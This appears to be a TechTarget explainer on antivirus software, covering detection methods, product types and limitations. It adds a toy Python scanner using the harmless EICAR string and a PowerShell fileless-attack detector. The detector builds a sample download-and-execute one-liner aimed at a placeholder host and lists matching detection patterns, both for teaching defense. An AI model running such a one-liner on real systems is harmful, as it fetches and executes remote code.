Security.com

antivirus software (antivirus program)

By Kinza Yasar

What is antivirus software (antivirus program)?

Antivirus software (antivirus program) is a security program designed to prevent, detect, search for and remove viruses and other types of malware from computers, networks and other devices. Often included as part of a security package, antivirus software can also be purchased as a standalone option.

Typically installed on a computer as a proactive approach to cybersecurity, an antivirus program can help mitigate a variety of cyber threats, including keyloggers, browser hijackers, Trojan horses, worms, rootkits, spyware, adware, botnets, phishing attempts and ransomware attacks.

Due to the constantly evolving nature of cybercrimes and new versions of malware being released daily, including zero-day attacks, no antivirus program can offer detection and protection against all threat vectors.

How antivirus software works

Antivirus software typically runs as a background process, scanning computers, servers or mobile devices to detect and restrict the spread of malware. Many antivirus software programs include real-time threat detection and protection to guard against potential vulnerabilities and perform system scans that monitor device and system files, looking for possible risks.

Antivirus software usually performs the following basic functions:

To scan systems comprehensively, antivirus software must generally be given privileged access to the entire system. This makes antivirus software itself a common target for attackers, and researchers have discovered remote code execution and other serious vulnerabilities in antivirus software products in recent years.

Benefits of antivirus software

The purpose of antivirus software isn't only to defend a system against security threats and vulnerabilities, but also to provide real-time protection through automated vulnerability scans.

Antivirus software provides the following benefits:

Types of antivirus programs

Antivirus software is distributed in several forms, including standalone antivirus scanners, machine learning and cloud-based programs, malware signatures and internet security software suites that offer antivirus protection, along with firewalls, privacy controls and other security protections. Popular providers of both free and commercial antivirus products include AVG Technologies, Kaspersky, Malwarebytes, McAfee, Norton and Trend Micro.

Some antivirus software vendors offer basic versions of their products at no charge. These free versions generally offer basic antivirus and spyware protection, but more advanced features and protections are usually available only to paying customers.

While some OSes are targeted more frequently by virus developers, antivirus software is available for most OSes:

Virus detection techniques

Antivirus software uses a variety of virus detection techniques. The following are six common types:

  1. Signature-based detection. Antivirus programs typically depend on stored virus signatures -- unique strings of data that are characteristic of known malware -- to flag malicious software. The antivirus software uses these signatures to identify viruses it encounters that security experts have already identified and analyzed.
  2. Heuristic-based detection. This type of detection uses an algorithm to compare the signatures of known viruses against potential threats. With heuristic-based detection, antivirus software can detect viruses that haven't been discovered yet, as well as existing viruses that have been disguised or modified and released as new viruses. However, this method can also generate false-positive matches when antivirus software detects a program behaving similarly to a malicious program and incorrectly identifies it as a virus.
  3. Behavior-based detection. Antivirus software can also use behavior-based detection to analyze an object's behavior or potential behavior for suspicious activities and infer malicious intent based on those observations. For example, code that attempts to perform unauthorized or abnormal actions would indicate the object is malicious or, at least, suspicious. Some examples of behaviors that potentially signal danger include modifying or deleting large numbers of files, monitoring keystrokes, changing settings of other programs and remotely connecting to computers.
  4. Cloud analysis. According to Atlas VPN, on average, hackers produced more than 316,000 malware threats daily in 2022. Since it's impossible for any antivirus program to combat the vast number of rapidly appearing malware variants, antivirus companies now provide cloud analysis as part of their antivirus offerings. Cloud analysis is a modern way of performing malware analysis, as it's done in the cloud on the antivirus vendor's servers. This way, if a malicious file or program is detected by the antivirus program, it's sent to the vendor's labs, where it's tested. If it's confirmed to be malicious, a signature is created for it, which blocks it on all the other devices where it's detected.
  5. Sandbox analysis. This detection technique runs a program or file in a virtual sandbox environment to analyze its behavior before permitting it into the system. Using this technique, antivirus software only permits a file to execute in the real environment if the sandbox analysis confirms it to be safe. This feature is also used for running files that the antivirus program is unable to allowlist or denylist. Since the files are executed in an isolated environment, even if they end up being malicious, no harm is done to the system, as they're only executed in a virtual sandbox container.
  6. Host intrusion prevention system (HIPS). Security and antivirus software commonly uses this technology to detect potentially malicious activities in a program using signature-based detection. A HIPS continuously monitors each activity and instantly notifies users by presenting them with authorization options, such as Allow and Block.
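
The first three techniques in the list above (signature-, heuristic- and behavior-based detection) can be shown side by side in a toy scanner. The following Python block is an added example, not code from the article or from any antivirus vendor. It uses the public EICAR test string as its one known signature; the heuristic weights, the entropy cutoff, the mass-file-change limit and the event stream fed to the behavior monitor are all constructed for the demo.

```python
"""Toy antivirus engine illustrating signature-, heuristic- and behavior-based
detection. Added example; every sample, weight and threshold is constructed."""
import hashlib
import math
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

# --- 1. Signature-based: exact hashes and byte patterns of known samples ---
# The EICAR test string is the harmless, industry-standard antivirus test signature.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
HASH_SIGNATURES = {hashlib.sha256(EICAR).hexdigest(): "EICAR-Test-File"}
BYTE_SIGNATURES = {b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE": "EICAR-Test-File"}


def signature_scan(data: bytes) -> Optional[str]:
    """Return the signature name on an exact hash or byte-pattern hit, else None."""
    hit = HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())
    if hit:
        return hit
    for pattern, name in BYTE_SIGNATURES.items():
        if pattern in data:
            return name
    return None


# --- 2. Heuristic: weighted static indicators. A threshold, not a single match,
#        produces the verdict, which is also where false positives come from ---
HEURISTIC_RULES = [
    (re.compile(rb"(?i)-encodedcommand"), 3, "encoded PowerShell argument"),
    (re.compile(rb"SetWindowsHookEx"), 2, "keyboard-hook API reference"),
    (re.compile(rb"(?i)IsDebuggerPresent"), 1, "anti-debugging check"),
]
ENTROPY_LIMIT = 7.2  # constructed cutoff; packed or encrypted payloads approach 8 bits/byte


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty or single-valued input, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def heuristic_scan(data: bytes, threshold: int = 4) -> Tuple[bool, int, List[str]]:
    """Return (verdict, score, reasons); verdict is True once score reaches threshold."""
    score, reasons = 0, []
    for pattern, weight, reason in HEURISTIC_RULES:
        if pattern.search(data):
            score += weight
            reasons.append(reason)
    if shannon_entropy(data) > ENTROPY_LIMIT:
        score += 2
        reasons.append("high entropy (possibly packed)")
    return score >= threshold, score, reasons


# --- 3. Behavior-based: judge what a running process does, not what it contains ---
MASS_FILE_CHANGE_LIMIT = 50  # constructed: modify/delete events from one process
SUSPICIOUS_ACTIONS = {
    "keystroke_monitor": "monitoring keystrokes",
    "remote_connect": "remote connection to another host",
    "change_other_program_settings": "changing another program's settings",
}


def behavior_scan(events: Iterable[Tuple[str, str, str]]) -> Dict[str, Set[str]]:
    """events: (process, action, target) triples as a kernel monitor would report.
    Returns {process: {reasons}} for every process that tripped a rule."""
    file_changes: Counter = Counter()
    flagged: Dict[str, Set[str]] = defaultdict(set)
    for process, action, _target in events:
        if action in SUSPICIOUS_ACTIONS:
            flagged[process].add(SUSPICIOUS_ACTIONS[action])
        if action in ("file_modify", "file_delete"):
            file_changes[process] += 1
            if file_changes[process] >= MASS_FILE_CHANGE_LIMIT:
                flagged[process].add("mass file modification/deletion")
    return dict(flagged)


def scan_file(data: bytes) -> Dict[str, object]:
    """Layered verdict: a signature hit is definitive; otherwise fall back to heuristics."""
    sig = signature_scan(data)
    if sig:
        return {"malicious": True, "method": "signature", "detail": sig}
    hit, score, reasons = heuristic_scan(data)
    return {"malicious": hit, "method": "heuristic", "score": score, "detail": reasons}


if __name__ == "__main__":
    # Constructed inputs: the EICAR string, a benign file and a suspicious-looking blob.
    print(scan_file(EICAR))
    print(scan_file(b"benign text file"))
    print(scan_file(b"-EncodedCommand AAAA SetWindowsHookEx"))
    events = [("editor.exe", "file_modify", "notes.txt")] * 3
    events += [("locker.exe", "file_modify", f"doc{i}.docx") for i in range(60)]
    events += [("agent.exe", "keystroke_monitor", "*")]
    print(behavior_scan(events))
```

The three layers are ordered the way the text describes: an exact signature match needs no further judgment, the heuristic score only becomes a verdict at a tunable threshold (lowering it catches more modified variants at the cost of the false positives the text warns about), and the behavior monitor never looks at file content at all, which is why it can flag a process whose binary matched nothing.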

Challenges facing antivirus software

According to CyberCrime Magazine, 90% of the world's population, ages 6 and older, will be connected to the internet by 2030. This exponential growth in internet connections is also responsible for the significant rise in viruses and cyber attacks.

While antivirus programs were originally developed to combat viruses and cyber threats, they do come with a few limitations.

The following highlights the current and future challenges of antivirus software:

Ever-evolving trends in technology, including the metaverse, Web3, fintech and autonomous vehicles, make it more challenging to get the right antivirus protection. With so many endpoints to secure -- from crypto wallets to virtual reality devices -- there are times that antivirus software could fall short. Most traditional antivirus technologies can't detect modern fileless attacks that use trusted systems, such as PowerShell, to carry out the attacks.
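
Because a fileless PowerShell attack leaves no file for a signature scanner to hash, the practical defense is to inspect process-creation telemetry (the command line and any encoded script it carries) instead. The Python block below is an added example of that approach and is not code from the article or from any vendor; the event shape, the three command lines, the indicator weights and the threshold are all constructed for the demo.

```python
"""Added example: scoring PowerShell process-creation events for fileless
activity. Event shapes, command lines, weights and threshold are constructed."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
ENCODED_ARG = re.compile(r"(?i)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})")

# Weighted indicators evaluated on the command line plus any decoded script.
INDICATORS = [
    (re.compile(r"(?i)\bIEX\b|Invoke-Expression"), 3, "dynamic code execution"),
    (re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"), 3, "in-script download"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1, "hidden window"),
    (re.compile(r"(?i)-ex(?:ecutionpolicy)?\s+bypass"), 1, "execution-policy bypass"),
]
ENCODED_WEIGHT = 2  # an encoded command is itself worth noting, not proof by itself
THRESHOLD = 4       # constructed cutoff for the demo


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(command_line)
    if not m or not "encodedcommand".startswith(m.group(1).lower()):
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_process_event(event: Dict[str, str]) -> Dict[str, object]:
    """event: {"image": ..., "command_line": ...} as a process-creation log carries."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return {"flagged": False, "score": 0, "indicators": [], "decoded": None}
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    score, found = 0, []
    if decoded is not None:
        score += ENCODED_WEIGHT
        found.append("encoded command")
    text = cmd + "\n" + (decoded or "")
    for pattern, weight, label in INDICATORS:
        if pattern.search(text):  # each indicator counts once, however often it appears
            score += weight
            found.append(label)
    return {"flagged": score >= THRESHOLD, "score": score, "indicators": found, "decoded": decoded}


def build_constructed_events() -> List[Dict[str, str]]:
    """Three constructed records: routine admin use, an encoded download-and-execute
    one-liner pointing at a reserved .invalid host, and a plaintext Invoke-Expression."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/')"
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        {"image": ps, "command_line": f"{ps} -NoProfile -File C:\\Scripts\\backup.ps1"},
        {"image": ps, "command_line": f"{ps} -w hidden -enc {b64}"},
        {"image": ps, "command_line": f'{ps} -Command "Invoke-Expression (Get-Content C:\\Temp\\x.ps1 -Raw)"'},
    ]


if __name__ == "__main__":
    for ev in build_constructed_events():
        print(analyze_process_event(ev))
```

The second record is the case a file scanner misses entirely: nothing touches disk, and the interesting content only appears after the base64/UTF-16LE argument is decoded. The third record scores below the threshold on purpose; a lone Invoke-Expression is common in legitimate administration, and the threshold is where a team trades coverage for false positives, just as with heuristic scanning.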

While antivirus software can mitigate certain ransomware attacks, it can't stop or remove ransomware once it's taken control of a system. Here's a step-by-step guide on how to remove ransomware and minimize its effect.

15 Mar 2023

All Rights Reserved, Copyright 2000 - 2024, TechTarget